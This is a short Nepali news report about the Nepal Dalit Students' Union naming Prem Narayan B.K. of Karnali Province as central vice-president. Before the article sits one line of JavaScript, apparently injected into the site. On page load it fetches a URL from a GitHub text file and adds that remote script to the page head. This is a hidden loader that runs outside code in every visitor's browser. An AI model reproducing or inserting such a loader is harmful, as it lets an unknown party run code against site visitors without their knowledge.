;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
२३ चैत,
काठमाडौँ | नेपाल दलित बिधार्थी संघले संगठन बिस्तार गर्ने क्रममा कर्णाली प्रदेशबाट प्रेम नारायण बि.क लाइ केन्द्रीय उपाध्यक्ष पदमा मनोनित गरेको छ | आज काठमाडौँमा भएको संघको बैठकले नेपाल दलित संघका केन्द्रीय अध्यक्ष मीन बिश्वकर्मा र नेपाल दलित बिधार्थी संघका केन्द्रीय अध्यक्ष राजु सुनारले पत्र प्रदान गरि मनोनित गरेका हुन्|
नेपाल दलित संघ चैथो महाधिबेशन पश्चात नेपाल दलित बिधार्थी संघको विधानको धारा १८ को (२) बमोजिम गठित नेपाल दलित संघको बिधान अनुसार उपाध्यक्ष मनोनित गरिएको हो |
फेसबुक प्रतिक्रियाहरु